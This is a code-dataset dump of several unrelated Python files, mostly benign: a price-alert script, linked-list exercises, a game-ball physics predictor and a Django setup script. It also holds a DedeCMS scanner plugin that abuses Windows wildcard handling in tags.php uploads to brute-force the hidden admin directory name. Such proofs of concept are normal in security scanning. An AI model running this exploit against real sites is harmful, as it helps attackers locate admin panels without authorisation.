blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7ed9756d26bc42e54fc782b2e0956c81dd48afb0 | a301e6dd6b215780bbd010ee2276aa58c35e8269 | /app.py | 277ea8f536f6fb3dc8e5bfa2bee83a0ae0c5e097 | [] | no_license | MadelineColeman/Amazon-Price-Checker | 3ab41207077a0e4a3e27c4e520eb8c51996fbd2c | 0b8048c055f6407012cb8926186c99cdcf36cfe1 | refs/heads/main | 2023-01-01T18:04:43.277248 | 2020-10-01T20:08:58 | 2020-10-01T20:08:58 | 300,407,152 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,481 | py | #%% Import Packages
from bs4 import BeautifulSoup
from urllib.request import Request, urlopen
import smtplib
import time
#%% Declare Varibles
headers = {'User-Agent':'Mozilla/5.0'}
#%%Get Price from Amazon
def getPrice():
    """Interactively track one Amazon product's price.

    Prompts once for the product URL and the Gmail credentials used for the
    alert, then polls the product page hourly until the price drops to the
    requested threshold, at which point an alert email is sent.

    Fix vs. original: the original recursed into itself every hour (re-prompting
    for URL/credentials each cycle and growing the call stack without bound);
    this version prompts once and loops.
    """
    url = input("Enter the Amazon Link: ")
    email = input("Please enter email to recieve alert: ")
    password = input('Please enter email password: ')
    alert_price = None
    while True:
        req = Request(url, headers=headers)
        page = urlopen(req).read()
        # Explicit parser avoids bs4's "no parser specified" warning and
        # parser-dependent behavior.
        soup = BeautifulSoup(page, 'html.parser')
        price = soup.find(id='priceblock_ourprice').get_text()
        title = soup.find(id="productTitle").get_text().strip()
        # Price text looks like "$12.34"; keep only the numeric part.
        price = float(price.split("$", 1)[1])
        print("The price of " + title + " is ${}".format(price))
        if alert_price is None:
            # Ask for the threshold only on the first iteration.
            alert_price = float(input("\nEnter the price you would like to be alerted at: "))
        if price <= alert_price:
            sendEmail(title, alert_price, url, email, password)
            break
        # Wait an hour before checking again.
        time.sleep(3600)
# %% Send Email
def sendEmail(title, alertPrice, url, email, password):
    """Send a price-drop alert email through Gmail's SMTP relay.

    :param title: product title to mention in the body
    :param alertPrice: threshold price the product fell below
    :param url: product link included in the body
    :param email: Gmail address used as both sender and recipient
    :param password: password (or app password) for that account
    """
    subject = "Amazon Price Alert"
    body = "{} is below ${:.2f}. Check out the link below\n{}".format(title, alertPrice, url)
    # Bug fix: the original f-string had a stray comma after {subject}, which
    # leaked a trailing comma into the SMTP Subject header.
    msg = f"Subject: {subject}\n\n{body}"
    # SMTP(host, port) already connects; the original's extra server.connect()
    # call was redundant and has been removed.
    server = smtplib.SMTP('smtp.gmail.com', 587)
    try:
        server.ehlo()
        server.starttls()  # upgrade to TLS before sending credentials
        server.ehlo()
        server.login(email, password)
        server.sendmail(email, email, msg)
    finally:
        # Always close the connection, even if login/send fails.
        server.quit()
# %% Run Script
getPrice()
| [
"colemanm191@gmail.com"
] | colemanm191@gmail.com |
e8e9487b576b340ae318034c411fb9faf9beddf3 | 0dcf78e319956f2cb2327c5cb47bd6d65e59a51b | /Python3/LinkedList/MergeKSortedLists/Heap023.py | 7010c6ca41757921ac2b6dda3a6dcb0459150e36 | [] | no_license | daviddwlee84/LeetCode | 70edd09a64a6f61492aa06d927e1ec3ab6a8fbc6 | da1774fd07b7326e66d9478b3d2619e0499ac2b7 | refs/heads/master | 2023-05-11T03:16:32.568625 | 2023-05-08T05:11:57 | 2023-05-09T05:11:57 | 134,676,851 | 14 | 4 | null | 2018-05-29T14:50:22 | 2018-05-24T07:18:31 | Python | UTF-8 | Python | false | false | 1,810 | py | from typing import List, Optional, Callable
from ..ListNodeModule import ListNode
import heapq
class HeapWrapper(object):
    """Min-heap of ListNodes ordered by ``key`` (default: the node's ``val``).

    Each heap entry is a ``(key, index, node)`` tuple; the strictly increasing
    ``index`` guarantees ties on ``key`` never fall through to comparing two
    ListNodes (which do not define ``<`` and would raise TypeError).
    """

    def __init__(self, initial: List[Optional[ListNode]] = (), key: Callable[[Optional[ListNode]], int] = lambda x: x.val) -> None:
        # NOTE: default changed from a mutable [] to an immutable (); the
        # argument is only iterated, so behavior is unchanged.
        self.key = key
        self._data = []
        self._index = 0
        # Bug fix: the original set _index = len(self._data) after filtering
        # out falsy items, so a later push() could reuse an index already
        # present in the heap and force a ListNode-vs-ListNode comparison.
        # Counting every input item (kept or skipped) keeps indices unique.
        for item in initial:
            if item:
                self._data.append((self.key(item), self._index, item))
            self._index += 1
        heapq.heapify(self._data)

    def __len__(self):
        return len(self._data)

    def push(self, item: ListNode):
        self._index += 1  # keep the tie-breaking index unique
        heapq.heappush(self._data, (self.key(item), self._index, item))

    def pop(self):
        # Return only the node, discarding the (key, index) bookkeeping.
        return heapq.heappop(self._data)[2]
class Solution:
    def mergeKLists(self, lists: List[Optional[ListNode]]) -> Optional[ListNode]:
        """Merge k sorted linked lists into one sorted list.

        A min-heap holds the current head of every non-empty list; repeatedly
        popping the smallest head and pushing its successor yields the merged
        order in O(N log k).
        """
        pending = HeapWrapper(lists)
        sentinel = ListNode(None)  # dummy head simplifies appending
        tail = sentinel
        while len(pending) > 0:
            smallest = pending.pop()
            tail.next = smallest
            tail = smallest
            if tail.next:
                # The popped node had a successor: it becomes a new candidate.
                pending.push(tail.next)
        return sentinel.next
if __name__ == '__main__':
    # Ad-hoc smoke test for HeapWrapper; runs only when executed directly.
    heap = HeapWrapper([ListNode(num) for num in (1, 2, 3, 4, 5, 6)])
    heap.push(ListNode(7))
    print(len(heap))
    print(heap.pop().val)
    print(bool(heap))
    # An empty heap is falsy because __len__ returns 0.
    print(bool(HeapWrapper()))  # Empty is false
| [
"daweilee@microsoft.com"
] | daweilee@microsoft.com |
a28380fa7c747fd2980e91a59c59853a625e2940 | 3cf1535bd23bfbfe078464eb6ba9043e30b2d67d | /RLBotPack/Skybot/bot_functions.py | 39e65467fbe9a1ecf5442a3283ad0c06a4459d71 | [
"MIT"
] | permissive | RLBot/RLBotPack | 11bab3be9dea24521853a5ba3f0ba5716c9922d2 | d4756871449a6e587186e4f5d8830fc73a85c33a | refs/heads/master | 2023-07-09T08:37:05.350458 | 2023-05-17T21:51:07 | 2023-05-17T21:51:07 | 188,609,141 | 27 | 132 | MIT | 2023-09-12T00:02:43 | 2019-05-25T20:24:44 | Python | UTF-8 | Python | false | false | 10,014 | py | import math
def ball_path_predict(data_loc_speed): # [self.game_time, self.ball_lt_z, self.ball_lt_speed_z]
    """Step-simulate the Rocket League ball for up to 5 seconds.

    data_loc_speed is [times, [x,y,z] positions, [x,y,z] velocities,
    [x,y,z] angular velocities]; only index ``start_on`` of each series is
    used as the initial state.

    Returns a 6-element list:
      [0] tick times, [1] predicted [x,y,z] per tick,
      [2] ground-contact times, [3] ground-contact [x,y,z],
      [4] goal time (0 if no goal), [5] goal position (zeros if no goal).

    NOTE(review): restitution/friction constants below look hand-tuned to
    approximate RL physics — confirm against gameplay before changing.
    """
    start_on=0
    #print(data_loc_speed)
    # Initial state: position, linear velocity, angular velocity, start time.
    loc_x=data_loc_speed[1][0][start_on]
    loc_y=data_loc_speed[1][1][start_on]
    loc_z=data_loc_speed[1][2][start_on]
    speed_x=data_loc_speed[2][0][start_on]
    speed_y=data_loc_speed[2][1][start_on]
    speed_z=data_loc_speed[2][2][start_on]
    ang_speed_x=data_loc_speed[3][0][start_on]
    ang_speed_y=data_loc_speed[3][1][start_on]
    ang_speed_z=data_loc_speed[3][2][start_on]
    time_i=data_loc_speed[0][start_on]
    timer=0
    time_l=[]
    ground_t=[]
    predic_loc_z_t=[]
    predic_loc_x_t=[]
    predic_loc_y_t=[]
    ground_loc_x=[]
    ground_loc_y=[]
    ground_loc_z=[]
    predicted_loc=[[],[[],[],[]],[],[[],[],[]],[],[[],[],[]]]
    bounce_t=0
    goal=False
    ground_next=False
    ball_rolling=False
    # Physics constants (arena units; gravity in uu/s^2, step = 1/120 s tick).
    air_friction=0.013
    gravity=-650
    ball_radius=93
    step=1/120
    perpendicular_restitution=0.60
    #todo: change depending on entry angle
    paralel_restitution=0.713
    spin_inertia=0.4
    while timer < 5:
        # Time since the last bounce; positions are integrated analytically
        # from the post-bounce state rather than step-by-step.
        time=timer-bounce_t
        #z
        loc_z_t=loc_z+((speed_z*(1-air_friction*time))*time)+(0.5*(gravity)*(time**2))
        #x
        loc_x_t=loc_x+((speed_x*(1-air_friction*time))*time)
        #y
        loc_y_t=loc_y+((speed_y*(1-air_friction*time))*time)
        # --- floor bounce ---
        if loc_z_t<ball_radius:
            speed_z=(speed_z*(1-air_friction*time-step)+gravity*(time-step))
            speed_z=abs(speed_z)*perpendicular_restitution
            loc_z=ball_radius
            loc_x=loc_x+((speed_x*(1-air_friction*time))*time)
            loc_y=loc_y+((speed_y*(1-air_friction*time))*time)
            bounce_t=timer
            ground_next=True
            # Below this vertical speed the ball stops bouncing and rolls.
            if speed_z < 0.01:
                speed_z=0
                ground_next=False
                ball_rolling=True
            speed_x=speed_x*(1-air_friction*time)#*paralel_restitution
            speed_y=speed_y*(1-air_friction*time)#*paralel_restitution
            if True:
                entry_angle = abs(math.atan2(speed_z,math.sqrt(speed_x**2+speed_y**2)))/math.pi*180
                # some more magic numbers
                custom_friction = (paralel_restitution-1)/(28)*entry_angle +1
                # limiting custom_friction to range [e1, 1]
                if custom_friction<paralel_restitution: custom_friction=paralel_restitution
                # Spin-velocity exchange at the contact point.
                speed_x = (speed_x + ang_speed_y * ball_radius * spin_inertia) * paralel_restitution
                speed_y = (speed_y - ang_speed_x * ball_radius * spin_inertia) * paralel_restitution
                ang_speed_x = -speed_y/ball_radius
                ang_speed_y = speed_x/ball_radius
                ang_speed_z = speed_z/ball_radius
                # limiting ball spin
                total_ang_speed = math.sqrt(ang_speed_x**2+ang_speed_y**2+ang_speed_z**2)
                if total_ang_speed > 6:
                    ang_speed_x,ang_speed_y,ang_speed_z = 6*ang_speed_x/total_ang_speed, 6*ang_speed_y/total_ang_speed, 6*ang_speed_z/total_ang_speed
        # --- ceiling bounce (arena height 2044) ---
        elif abs(loc_z_t)>2044-ball_radius:
            loc_z=2044-ball_radius
            speed_z=-(speed_z*(1-air_friction*time-step)+gravity*(time-step))
            #speed_z=speed_z*(1-air_friction*(time))
            speed_z=speed_z*perpendicular_restitution
            loc_y=loc_y+((speed_y*(1-air_friction*(time)))*(time))
            speed_y=speed_y*(1-air_friction*(time)) #*paralel_restitution
            loc_x=loc_x+((speed_x*(1-air_friction*(time)))*(time))
            speed_x=speed_x*(1-air_friction*(time)) #*paralel_restitution
            if True:
                entry_angle = abs(math.atan2(speed_z,math.sqrt(speed_x**2+speed_y**2)))/math.pi*180
                # some more magic numbers
                custom_friction = (paralel_restitution-1)/(28)*entry_angle +1
                # limiting custom_friction to range [e1, 1]
                if custom_friction<paralel_restitution: custom_friction=paralel_restitution
                speed_x = (speed_x + ang_speed_z * ball_radius * spin_inertia) * custom_friction
                speed_y = (speed_y + ang_speed_z * ball_radius * spin_inertia) * paralel_restitution
                #speed_z = (speed_x - ang_speed_y * ball_radius * spin_inertia) * paralel_restitution
                ang_speed_x = speed_z/ball_radius
                ang_speed_y = speed_z/ball_radius
                #ang_speed_z = speed_y/ball_radius
                # limiting ball spin
                total_ang_speed = math.sqrt(ang_speed_x**2+ang_speed_y**2+ang_speed_z**2)
                if total_ang_speed > 6:
                    ang_speed_x,ang_speed_y,ang_speed_z = 6*ang_speed_x/total_ang_speed, 6*ang_speed_y/total_ang_speed, 6*ang_speed_z/total_ang_speed
            bounce_t=timer
        # --- side-wall bounce (|x| = 4096) ---
        elif abs(loc_x_t)>4096-ball_radius:
            if loc_x>0:
                loc_x=4096-ball_radius
            else:
                loc_x=-4096+ball_radius
            speed_x=speed_x*(1-air_friction*(time))
            speed_x=-speed_x*perpendicular_restitution
            loc_y=loc_y+((speed_y*(1-air_friction*(time)))*(time))
            speed_y=speed_y*(1-air_friction*(time))#*paralel_restitution
            loc_z=loc_z+((speed_z*(1-air_friction*(time)))*(time))+(0.5*(gravity)*((time)**2))
            speed_z=(speed_z*(1-air_friction*(time-step))+gravity*((time-step)))#*paralel_restitution #implement spin
            if True:
                entry_angle = abs(math.atan2(speed_z,math.sqrt(speed_x**2+speed_y**2)))/math.pi*180
                # some more magic numbers
                custom_friction = (paralel_restitution-1)/(28)*entry_angle +1
                # limiting custom_friction to range [e1, 1]
                if custom_friction<paralel_restitution: custom_friction=paralel_restitution
                #speed_x = (speed_x + ang_speed_z * ball_radius * spin_inertia) * custom_friction
                speed_y = (speed_y + ang_speed_z * ball_radius * spin_inertia) * paralel_restitution
                speed_z = (speed_z - ang_speed_y * ball_radius * spin_inertia) * paralel_restitution
                #ang_speed_x = -speed_z/ball_radius
                ang_speed_y = -speed_z/ball_radius
                ang_speed_z = speed_y/ball_radius
                # limiting ball spin
                total_ang_speed = math.sqrt(ang_speed_x**2+ang_speed_y**2+ang_speed_z**2)
                if total_ang_speed > 6:
                    ang_speed_x,ang_speed_y,ang_speed_z = 6*ang_speed_x/total_ang_speed, 6*ang_speed_y/total_ang_speed, 6*ang_speed_z/total_ang_speed
            bounce_t=timer
        # --- back-wall bounce (|y| = 5120) or goal ---
        elif abs(loc_y_t)>5120-ball_radius:
            # Inside the goal mouth (half-width ~893, height ~643): goal.
            if abs(loc_x_t)<892.755-ball_radius and abs(loc_z_t)<642.775-ball_radius:
                goal=True
                break
            if loc_y>0:
                loc_y=5120-ball_radius
            else:
                loc_y=-5120+ball_radius
            speed_y=speed_y*(1-air_friction*time)#*paralel_restitution
            speed_y=-speed_y*perpendicular_restitution
            loc_z=loc_z+((speed_z*(1-air_friction*time))*time)+(0.5*(gravity)*(time**2))
            loc_x=loc_x+((speed_x*(1-air_friction*time))*time)
            speed_x=speed_x*(1-air_friction*time)#*paralel_restitution
            speed_z=(speed_z*(1-air_friction*(time-step))+gravity*((time-step)))#*paralel_restitution
            if True:
                entry_angle = abs(math.atan2(speed_z,math.sqrt(speed_x**2+speed_y**2)))/math.pi*180
                # some more magic numbers
                custom_friction = (paralel_restitution-1)/(28)*entry_angle +1
                # limiting custom_friction to range [e1, 1]
                if custom_friction<paralel_restitution: custom_friction=paralel_restitution
                speed_x = (speed_x - ang_speed_z * ball_radius * spin_inertia) * paralel_restitution
                #speed_y = (speed_y + ang_speed_z * ball_radius * spin_inertia) * custom_friction
                speed_z = (speed_z + ang_speed_x * ball_radius * spin_inertia) * custom_friction
                ang_speed_x = -speed_z/ball_radius
                #ang_speed_y = -speed_z/ball_radius
                ang_speed_z = speed_y/ball_radius
                # limiting ball spin
                total_ang_speed = math.sqrt(ang_speed_x**2+ang_speed_y**2+ang_speed_z**2)
                if total_ang_speed > 6:
                    ang_speed_x,ang_speed_y,ang_speed_z = 6*ang_speed_x/total_ang_speed, 6*ang_speed_y/total_ang_speed, 6*ang_speed_z/total_ang_speed
            bounce_t=timer
        # --- no collision this tick: record the sample and advance ---
        else:
            predic_loc_z_t+=[loc_z_t]
            predic_loc_x_t+=[loc_x_t]
            predic_loc_y_t+=[loc_y_t]
            tick_time=[timer+time_i]
            time_l+=tick_time
            timer+=step
            # First sample after a bounce counts as a ground contact point.
            if ground_next:
                ground_t+=tick_time
                ground_loc_x+=[loc_x_t]
                ground_loc_y+=[loc_y_t]
                ground_loc_z+=[loc_z_t]
                ground_next=False
            # While rolling, every sample is a ground contact point.
            if ball_rolling:
                ground_loc_x+=[loc_x_t]
                ground_loc_y+=[loc_y_t]
                ground_loc_z+=[loc_z_t]
    # Assemble the result structure described in the docstring.
    predicted_loc[0]=time_l
    predicted_loc[1][0]=predic_loc_x_t
    predicted_loc[1][1]=predic_loc_y_t
    predicted_loc[1][2]=predic_loc_z_t
    predicted_loc[2]=ground_t
    predicted_loc[3][0]=ground_loc_x
    predicted_loc[3][1]=ground_loc_y
    predicted_loc[3][2]=ground_loc_z
    if goal:
        predicted_loc[4]=timer
        predicted_loc[5][0]=loc_x
        predicted_loc[5][1]=loc_y
        predicted_loc[5][2]=loc_z
    else:
        predicted_loc[4]=0
        predicted_loc[5][0]=0
        predicted_loc[5][1]=0
        predicted_loc[5][2]=0
    return predicted_loc
| [
"noreply@github.com"
] | RLBot.noreply@github.com |
83ebf96ed9d709453f2542d0921655ff7857ce40 | caf135d264c4c1fdd320b42bf0d019e350938b2d | /04_Algorithms/Leetcode/L24_Swap Nodes in Pairs.py | eba7c0bc0a8f2006110eb82a2b8a1604aa56fe07 | [] | no_license | coolxv/DL-Prep | 4243c51103bdc38972b8a7cbe3db4efa93851342 | 3e6565527ee8479e178852fffc4ccd0e44166e48 | refs/heads/master | 2022-12-31T22:42:20.806208 | 2020-10-23T10:19:19 | 2020-10-23T10:19:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 807 | py | # Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def swapPairs(self, head: ListNode) -> ListNode:
if not head or not head.next:
return head
else:
first = head
second = first.next
afternode = second.next
head = second
head.next = first
first.next = afternode
while afternode and afternode.next:
prevnode = first
first,second = afternode,afternode.next
afternode = second.next
prevnode.next = second
second.next = first
first.next = afternode
return head
| [
"1574572981@qq.com"
] | 1574572981@qq.com |
f851895535c8f43ebe64751ebaf22d82378cf452 | 1e0b77feea4aa08f2aa9ff63feddbc818428a350 | /script/dedecms/dedecms_win_find_manage.py | 77efcee0ec9487364ba143234992930c3a5232e7 | [] | no_license | cleanmgr112/Tentacle | 838b915430166429da3fe4ed290bef85d793fae4 | 175e143fc08d1a6884a126b7da019ef126e116fa | refs/heads/master | 2022-12-08T06:36:28.706843 | 2020-08-26T14:06:35 | 2020-08-26T14:06:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,769 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @author: 'orleven'
import itertools
from lib.utils.connect import ClientSession
from lib.core.enums import VUL_LEVEL
from lib.core.enums import VUL_TYPE
from lib.core.enums import SERVICE_PORT_MAP
from script import Script
class POC(Script):
def __init__(self, target=None):
self.service_type = SERVICE_PORT_MAP.WEB
self.name = 'dedecms win manager'
self.keyword = ['dedecms', 'win', 'manager']
self.info = 'Find manager for dedecms'
self.type = VUL_LEVEL.MEDIUM
self.level = VUL_LEVEL.INFO
self.refer = 'https://xz.aliyun.com/t/2064'
Script.__init__(self, target=target, service_type=self.service_type)
async def prove(self):
await self.get_url()
if self.base_url:
characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"
_data = {
"_FILES[mochazz][tmp_name]": "./{p}<</images/adminico.gif",
"_FILES[mochazz][name]": 0,
"_FILES[mochazz][size]": 0,
"_FILES[mochazz][type]": "image/gif"
}
path_list = list(set([
self.url_normpath(self.base_url, '/'),
self.url_normpath(self.base_url, '../dedecms/'),
self.url_normpath(self.url, 'dedecms/'),
self.url_normpath(self.url, '../dedecms/'),
]))
async with ClientSession() as session:
for path in path_list:
url = path + 'tags.php'
back_dir = ""
flag = 0
async with session.get(url=url) as res:
if res!=None and res.status ==200:
for num in range(1, 7):
if flag ==1 :
break
for pre in itertools.permutations(characters, num):
pre = ''.join(list(pre))
_data["_FILES[mochazz][tmp_name]"] = _data["_FILES[mochazz][tmp_name]"].format(p=pre)
async with session.post(url=url, data=_data) as r:
if r!=None:
if r.status == 405:
return
text = await r.text()
if "Upload filetype not allow !" not in text and r.status == 200:
flag = 1
back_dir = pre
_data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
break
else:
_data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
flag = 0
x = 0
for i in range(30):
if flag == 1:
x = i
break
for ch in characters:
if ch == characters[-1]:
flag = 1
x = i
break
_data["_FILES[mochazz][tmp_name]"] = _data["_FILES[mochazz][tmp_name]"].format(p=back_dir + ch)
async with session.post(url=url, data=_data) as r:
if r!=None:
if r.status == 405:
return
text = await r.text()
if "Upload filetype not allow !" not in text and r.status == 200:
back_dir += ch
_data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
break
else:
_data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
if x < 29 and flag ==1:
self.flag = 1
self.req.append({"url": path+ '/'+back_dir})
self.res.append({"info": path+'/'+ back_dir, "key": 'dede_manager'})
| [
"546577246@qq.com"
] | 546577246@qq.com |
db5c540680482b042de2c5eec273df36b97e0aa9 | e0441dd7ce7555a0a36e8f6e306a639e7e2be108 | /py/字符.py | d8129cd6df186a6e73de71dd2c6bc684e2ffbb4f | [] | no_license | knzh/Python | 7e6da74e1e1264de0ab342dfaf54f872d0c90f68 | d527a045c23f3d37ad65596977e615161f2bda6e | refs/heads/master | 2020-05-24T07:17:31.366363 | 2019-12-23T02:36:02 | 2019-12-23T02:36:02 | 187,153,061 | 0 | 0 | null | 2019-05-17T06:10:55 | 2019-05-17T05:38:19 | null | UTF-8 | Python | false | false | 290 | py | message="侃大山计量付款"
# Demonstrate basic str case/whitespace methods on small sample strings.
print(message)

lower_abc = "abc"
mixed_abc = "Abc"
trailing_abc = "abc "
padded_abc = " abc "

# Same output sequence as before: title/upper on "abc", upper/lower on "Abc",
# then the whitespace-stripping variants.
for text in (lower_abc.title(), lower_abc.upper(),
             mixed_abc.upper(), mixed_abc.lower(),
             trailing_abc.rstrip(), padded_abc.lstrip()):
    print(text)
print(message_5.strip()) | [
"jykainan@163.com"
] | jykainan@163.com |
ae771cde651399504bba751485f82bbb7e7a73bb | 4628a6c1f54773f87b39146ac989d084234cee62 | /Code Reader/ObjSenseImage.py | 6f0e5df4ea023b88a4e21e936ce53e1e8049beef | [] | no_license | IshanVaidya2007/PyRo-Tutorials | 8e96d7a2ecb54990498699d3c35daf840dc78253 | c4754332bde648734700019235d04efb207aa33c | refs/heads/main | 2023-02-02T19:14:24.960565 | 2020-12-14T05:11:12 | 2020-12-14T05:11:12 | 323,958,833 | 0 | 0 | null | 2020-12-23T17:07:15 | 2020-12-23T17:07:15 | null | UTF-8 | Python | false | false | 1,502 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Oct 31 13:51:42 2020
@author: LearnLeap
"""
import pygame
import time
from Phygital_v0 import Phygital_v0 as pyro

# Pin Initialization
pyro.pinMode('A0','dOutput')
pyro.pinMode('A5','dInput')
# Communication Init
pyro.init("COM8")
pygame.init()
width=660
height=690
screen = pygame.display.set_mode( ( width, height) )
# Set a Title of Screen
pygame.display.set_caption('Object Sensor State')

# Poll the digital object sensor on A5 ~10x/s and show the matching image
# until the window is closed or the user hits Ctrl-C.
eventstatus="none"
while True:
    pygame.display.update()
    try:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                pyro.close()
                pygame.quit()
                # Bug fix: original assigned "eventstaus" (typo), so the quit
                # flag below was never actually set and the loop never exited.
                eventstatus="quit"
                break
        if eventstatus=="quit":
            break
        data=pyro.dRead('A5')
        # Sensor reads 0 when an object is detected (active low).
        if data==0:
            path = pygame.image.load("Images/ObjSensed.png").convert_alpha()
            path1=pygame.transform.scale(path,(630,660))
            screen.blit(path1,(15,15))
        else:
            path=pygame.image.load("Images/NoObj.png").convert_alpha()
            path1=pygame.transform.scale(path,(630,660))
            screen.blit(path1,(15,15))
        time.sleep(0.1)
    # Bug fix: original used a bare "except:" followed by "if KeyboardInterrupt:"
    # (the class object, always truthy), which swallowed every error and broke
    # the loop on any exception. Catch only the interrupt we mean to handle.
    except KeyboardInterrupt:
        pyro.close()
        break
print("Closing")
"noreply@github.com"
] | IshanVaidya2007.noreply@github.com |
162a20d336fdb8bd17fc5ea13e27d793e2d0fc97 | bb8cead9d67a79b7a702e04251fe27f9a782cd60 | /api/run.py | db24ba7234680269e47947c8582baf14cbc5314b | [] | no_license | florianbgt/todo-app | 2d3ead22f884bfb9544bc5523dc6e4ae859c88ad | e2330b1fd797d28777dab7dfe23306b7e1e72a7b | refs/heads/main | 2023-08-28T04:30:25.188341 | 2021-10-25T12:43:00 | 2021-10-25T12:43:00 | 419,964,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 634 | py | import os
# DJANGO_SETTINGS_MODULE must be set before django.setup() and before any
# django.* imports that touch settings.
os.environ.setdefault('DJANGO_SETTINGS_MODULE','_project.settings')
import django
django.setup()
# These imports require an initialized Django app registry (setup() above).
from django.core.management import call_command
from django.conf import settings
from django.contrib.auth.models import User
if __name__ == "__main__":
    # Rebuild the database from scratch on every run: drop the SQLite file,
    # re-run migrations, and ensure a default superuser exists.
    try:
        os.remove(settings.DATABASES['default']['NAME'])
    # Narrowed from a bare "except:" — only a missing/inaccessible db file is
    # an expected, ignorable condition here; other errors should surface.
    except OSError:
        print('db does not exists, skip deletion')
    call_command("migrate", interactive=False)
    if not User.objects.filter(username='admin').exists():
        # Dev-only credentials; do not use in production.
        User.objects.create_superuser(
            username='admin',
            email='',
            password='testpass123',
        )
"florianbgt@users.noreply.github.com"
] | florianbgt@users.noreply.github.com |
a907448564d7d4dbe4324695f4bc955e6226f0d8 | 8658016febe481a7e6ae0d449a3a6d4730fad6d8 | /other/add_two_ll_num.py | 88242fad1dfd23694ed8bdefaf0eebbd798f1a52 | [] | no_license | ashleyhma/hb-challenges | 74b2bc193eeb736a021b17506c8ed2bd270ced2f | 8421195e492ef630211722737241ba484ac827e0 | refs/heads/master | 2020-05-01T08:13:18.827042 | 2019-07-13T16:48:14 | 2019-07-13T16:48:14 | 177,373,131 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,121 | py | class ListNode(object):
def __init__(self, x, y=None):
self.val = x
self.next = y
class Solution(object):
    """You are given two non-empty linked lists representing two non-negative integers. The digits are stored in reverse order and each of their nodes contain a single digit. Add the two numbers and return it as a linked list."""

    def addTwoNumbers(self, l1, l2):
        """
        :type l1: ListNode
        :type l2: ListNode
        :rtype: ListNode
        """
        # Decode each list into an integer, add, then re-encode in reverse.
        num1 = self._to_int(l1)
        num2 = self._to_int(l2)
        # Fix: removed the leftover debug print(num1 + num2) from the original.
        return self.list_to_link(str(num1 + num2))

    def _to_int(self, node):
        # Digits are stored least-significant first, so reverse before joining.
        digits = []
        while node:
            digits.append(str(node.val))
            node = node.next
        return int(''.join(digits[::-1]))

    def list_to_link(self, lst):
        """Build a linked list from the digit string *lst*, last char first.

        NOTE: node values are single-character strings (not ints), matching
        the original implementation's behavior.
        """
        if len(lst) == 1:
            return ListNode(lst[-1])
        return ListNode(lst[-1], self.list_to_link(lst[:-1]))
"ashleyheidima@gmail.com"
] | ashleyheidima@gmail.com |
7609c254a4dfe0c0e6f990924b4919bcf3d1d726 | cf3510e161b105921639f3a9f4682ca948f72085 | /tensormonk/plots/__init__.py | b6a63b39f6676568d9d667207627ab82f0050d40 | [
"MIT"
] | permissive | Tensor46/TensorMONK | eedf762f42d44e2a9a58859f86c1221c610192ad | 67617d3fdf8fde072ba9cab42de7d67c79b17494 | refs/heads/master | 2022-03-10T08:46:32.489207 | 2021-02-21T14:47:27 | 2021-02-21T14:47:27 | 135,519,908 | 31 | 8 | MIT | 2021-02-21T14:47:28 | 2018-05-31T02:15:39 | Python | UTF-8 | Python | false | false | 188 | py | """ TensorMONK :: plots """
# Public API of tensormonk.plots.
__all__ = ["make_gif", "VisPlots", "line_plot"]

from .gif import make_gif
from .visplots import VisPlots
from .line import line_plot
# Remove the submodule names so only the re-exported symbols are visible
# on the package namespace.
del gif, visplots, line
| [
"vikas11187@gmail.com"
] | vikas11187@gmail.com |
6067d658856d2331f217e780a4b3cbfee1d37d74 | 6e6ef650d0fd5e5006dab4d755bb4ac77de43072 | /parsing/split.py | 8a33d0d7f4eeac8d5000655ed9752faad65173e6 | [] | no_license | raymondroc/an-open-review-of-openreview | b2f2a4dcd7badbbd55ab535f4f319ae8d888afa6 | 7d94a42096759b36739090f9801dc2a09dec0380 | refs/heads/main | 2023-01-10T15:22:06.851193 | 2020-11-13T18:39:30 | 2020-11-13T18:39:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 889 | py | import csv
def append(filename, row):
    """Append one *row* to the CSV file *filename*, creating it if absent."""
    # newline='' is required so the csv module controls line endings itself.
    with open(filename, 'a+', newline='') as out_file:
        csv.writer(out_file).writerow(row)
# Walk the author and review CSVs in lockstep and fan each combined row out
# into one of four per-reviewer shard files (1250 rows each, remainder to the
# last shard). Each output row is: author[0:2] + review column 3 + author[2:].
with open('../authordata.csv', encoding='latin-1') as authorin, open('../openreview_v8_deletions.csv', encoding='latin-1') as reviewin:
    author_reader = csv.reader(authorin)
    review_reader = csv.reader(reviewin)
    cnt = 1
    for row_author in author_reader:
        # Assumes both files have the same number of rows — next() raises
        # StopIteration if the review file is shorter. TODO confirm.
        row_review = next(review_reader)
        if cnt <= 1250:
            append('../Check_Authors/alex.csv', row_author[:2] + [row_review[3]] + row_author[2:])
        elif cnt <= 2500:
            append('../Check_Authors/raymond.csv', row_author[:2] + [row_review[3]] + row_author[2:])
        elif cnt <= 3750:
